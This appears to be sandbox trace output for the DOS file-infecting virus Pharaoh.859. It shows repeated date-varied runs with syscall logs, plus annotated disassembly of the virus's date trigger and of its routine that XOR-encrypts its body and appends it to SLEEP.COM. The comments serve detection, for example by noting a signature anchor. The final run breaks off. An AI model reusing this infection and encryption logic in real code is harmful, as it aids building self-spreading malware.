Sample viewer

vx.netlux.org/Virus.DOS.Pharaoh.859


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-17T22:22:05.398645497Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-17T22:22:05.401676578Z 71 PC: 12b2e | Get current directory
2018-12-17T22:22:05.40517135Z 26 PC: 12b35 | Set disk transfer address
2018-12-17T22:22:05.406387075Z 25 PC: 12b39 | Get default drive
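2018-12-17T22:22:05.407593762Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-17T22:22:05.413432961Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]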
2018-12-17T22:22:05.414775546Z 78 PC: 12b68 | Find first file
2018-12-17T22:22:05.421472407Z 67 PC: 12cac | Get or set file attributes
2018-12-17T22:22:05.428245252Z 67 PC: 12cac | Get or set file attributes
2018-12-17T22:22:05.441119069Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:22:05.445587873Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.44742635Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-17T22:22:05.4516524Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-17T22:22:05.453613483Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.45554059Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-17T22:22:05.464626365Z 66 PC: 12ca0 | Move file pointer
2018-12-17T22:22:05.465868674Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:22:05.473318672Z 87 PC: 12c4e | Get or set file date and time
2018-12-17T22:22:05.474799686Z 87 PC: 12c5a | Get or set file date and time
2018-12-17T22:22:05.476384213Z 62 PC: 12c5f | Close file
2018-12-17T22:22:05.485673207Z 67 PC: 12c69 | Get or set file attributes
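2018-12-17T22:22:05.496749033Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]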
2018-12-17T22:22:05.503710037Z 59 PC: 12c93 | Change current directory
2018-12-17T22:22:05.508766117Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-25T11:50:19.396081922Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-25T11:50:19.398941299Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.403077083Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.404184752Z 25 PC: 12b39 | Get default drive
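2018-12-25T11:50:19.405550987Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-25T11:50:19.406806376Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]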
2018-12-25T11:50:19.408195643Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.414623856Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.426288232Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:19.444161425Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:19.451646958Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:19.453895861Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-25T11:50:19.461075043Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-25T11:50:19.464385486Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.46721295Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:19.493809779Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.495763461Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:19.503973178Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:19.506113801Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:19.507661593Z 62 PC: 12c5f | Close file
2018-12-25T11:50:19.516120506Z 67 PC: 12c69 | Get or set file attributes
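2018-12-25T11:50:19.527962856Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]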
2018-12-25T11:50:19.529371404Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:19.533704941Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-25T11:50:19.443398658Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-25T11:50:19.446240528Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.448886263Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.449826846Z 25 PC: 12b39 | Get default drive
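2018-12-25T11:50:19.459312121Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-25T11:50:19.460375299Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]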
2018-12-25T11:50:19.461457946Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.47709848Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.482711103Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:20.326976432Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:20.353185383Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:20.354645141Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-25T11:50:20.361183548Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-25T11:50:20.363913974Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:20.365317016Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:20.400331248Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:20.402028851Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:20.408508996Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:20.409777201Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:20.411586929Z 62 PC: 12c5f | Close file
2018-12-25T11:50:20.448330238Z 67 PC: 12c69 | Get or set file attributes
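2018-12-25T11:50:20.485541428Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]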
2018-12-25T11:50:20.48636537Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:20.489360729Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":25,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-25T11:50:19.767365957Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-25T11:50:19.770849066Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.774230756Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.775554465Z 25 PC: 12b39 | Get default drive
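2018-12-25T11:50:19.776931625Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-25T11:50:19.779267515Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]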
2018-12-25T11:50:19.780510216Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.787813811Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.794292011Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:19.811774943Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:19.819145262Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:19.82124621Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-25T11:50:19.829096569Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-25T11:50:19.831965599Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.834628304Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:19.844416588Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:19.84601616Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:19.852126296Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:19.855036104Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:19.857096976Z 62 PC: 12c5f | Close file
2018-12-25T11:50:19.866542617Z 67 PC: 12c69 | Get or set file attributes
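2018-12-25T11:50:19.879145824Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]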
2018-12-25T11:50:19.880850146Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:19.885829302Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":7,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
; The tracer prints a fixed window of instructions; the listing stops after 0x12aed.
; The next logged call in this run is at PC 12b2e and nothing is logged from 0x12add/0x12ae9,
; so this run presumably left through 0x12b0e (target not shown).
2018-12-25T11:50:19.893964713Z 42 PC: 12abf | Get date 0x12abf: cmp al, 5  ; day of week == 5 (Friday)?
0x12ac1: jne 0x12b0e  ; not Friday -> skip the payload
0x12ac3: cmp dl, 0x19  ; day of month against 25
0x12ac6: jbe 0x12b0e  ; day <= 25 (unsigned) -> skip
0x12ac8: cmp cx, 0x7c8  ; year against 1992
0x12acc: jg 0x12ad3  ; year > 1992 -> payload, month is not checked
0x12ace: cmp dh, 0xb  ; year <= 1992: month against 11
0x12ad1: jb 0x12b0e  ; before November -> skip
; Payload path: reached only on a Friday after the 25th, in any year after 1992
; or in November/December of an earlier year.
0x12ad3: mov al, 3
0x12ad5: mov ah, 0
0x12ad7: int 0x10  ; BIOS video AH=00h: set mode 3 (80x25 text)
0x12ad9: lea dx, word ptr [bp + 0x30f]  ; DX -> data at bp+0x30f; BP looks like the body's base register (assumption, its setup is not shown)
0x12add: mov ah, 9
0x12adf: int 0x21  ; DOS AH=09h: print the '$'-terminated string at DS:DX
0x12ae1: mov ah, 0x25
0x12ae3: mov al, 9
0x12ae5: lea dx, word ptr [bp + 0x303]
0x12ae9: int 0x21  ; DOS AH=25h: repoint INT 09h (keyboard hardware interrupt) to DS:DX = bp+0x303; handler body not shown
0x12aeb: mov ah, 2
0x12aed: mov dx, 0  ; window ends here; the consumer of AH=2 / DX=0 is not shown
2018-12-25T11:50:19.897083481Z 71 PC: 12b2e | Get current directory
2018-12-25T11:50:19.89950703Z 26 PC: 12b35 | Set disk transfer address
2018-12-25T11:50:19.90065305Z 25 PC: 12b39 | Get default drive
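2018-12-25T11:50:19.902579004Z 53 PC: 12b4a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]
2018-12-25T11:50:19.903693667Z 37 PC: 12b5e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]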
2018-12-25T11:50:19.904814042Z 78 PC: 12b68 | Find first file
2018-12-25T11:50:19.911448644Z 67 PC: 12cac | Get or set file attributes
2018-12-25T11:50:19.921609323Z 67 PC: 12cac | Get or set file attributes (See above)
2018-12-25T11:50:21.025182698Z 61 PC: 12ba1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:21.029966322Z 66 PC: 12ca0 | Move file pointer
2018-12-25T11:50:21.031072916Z 63 PC: 12bb4 | Read file or device (Read 3 bytes on handle 5)
; Builds the encrypted copy of the body, listed from the return address of the logged
; "Get time" call (op 44 = INT 21h AH=2Ch, which returns hundredths of a second in DL).
; Layout visible here: 0x35b (859) bytes copied, the first 0x17 (23) left in clear,
; the remaining 0x344 (836) XORed with a one-byte key. As far as this window shows,
; only the key byte at body offset 0x13 changes inside the clear prefix between infections,
; which makes that prefix the natural anchor for a static signature.
2018-12-25T11:50:21.061305486Z 44 PC: 12bf5 | Get time 0x12bf5: inc dl  ; key = hundredths + 1
0x12bf7: lea si, word ptr [bp + 0x111]
0x12bfb: mov byte ptr [si + 2], dl  ; store the key at bp+0x113, i.e. offset 0x13 of the body, before it is copied; presumably the decryptor's XOR operand (decryptor not shown)
0x12bfe: mov cx, 0x35b  ; 0x35b = 859, the size in the sample name and in the logged write
0x12c01: lea si, word ptr [bp + 0x100]  ; source: start of the body
0x12c05: mov di, 0xfc00  ; destination: buffer at ES:0xFC00
0x12c08: rep movsb byte ptr es:[di], byte ptr [si]  ; copy the whole body into the buffer
0x12c0a: mov si, 0xfc00
0x12c0d: add si, 0x17  ; skip the first 23 bytes of the copy
0x12c10: nop
0x12c11: mov di, si  ; read and write the same position: transform in place
0x12c13: mov cx, 0x344  ; 0x344 = 836 = 859 - 23 bytes to transform
0x12c16: lodsb al, byte ptr [si]
0x12c17: xor al, dl  ; single-byte XOR with the clock-derived key
0x12c19: stosb byte ptr es:[di], al
0x12c1a: loop 0x12c16
0x12c1c: pop bx
0x12c1d: push bx  ; reload BX from the top of the stack without consuming it; presumably the file handle
0x12c1e: mov al, 2
0x12c20: call 0x12c98  ; helper not shown; the next logged call is "Move file pointer" at PC 12ca0, so AL=2 is probably the seek origin (end of file)
2018-12-25T11:50:21.063467305Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.065067178Z 64 PC: 12c2e | Write file or device (Write 859 bytes on handle 5)
2018-12-25T11:50:21.130440388Z 66 PC: 12ca0 | Move file pointer (See above)
2018-12-25T11:50:21.131758678Z 64 PC: 12c48 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:21.14609567Z 87 PC: 12c4e | Get or set file date and time
2018-12-25T11:50:21.148194264Z 87 PC: 12c5a | Get or set file date and time
2018-12-25T11:50:21.149520535Z 62 PC: 12c5f | Close file
2018-12-25T11:50:21.193430786Z 67 PC: 12c69 | Get or set file attributes
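2018-12-25T11:50:21.275645491Z 37 PC: 12c8b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [label mismatch: vector 36 = 0x24 is INT 24h, the DOS critical-error handler; 'Set random record number' is the unrelated INT 21h function 24h]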
2018-12-25T11:50:21.276686814Z 59 PC: 12c93 | Change current directory
2018-12-25T11:50:21.281171062Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3865,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Date trigger, listed from the return address of the logged "Get date" call
; (op 42 = INT 21h AH=2Ah: AL = day of week with 0 = Sunday, CX = year, DH = month, DL = day).
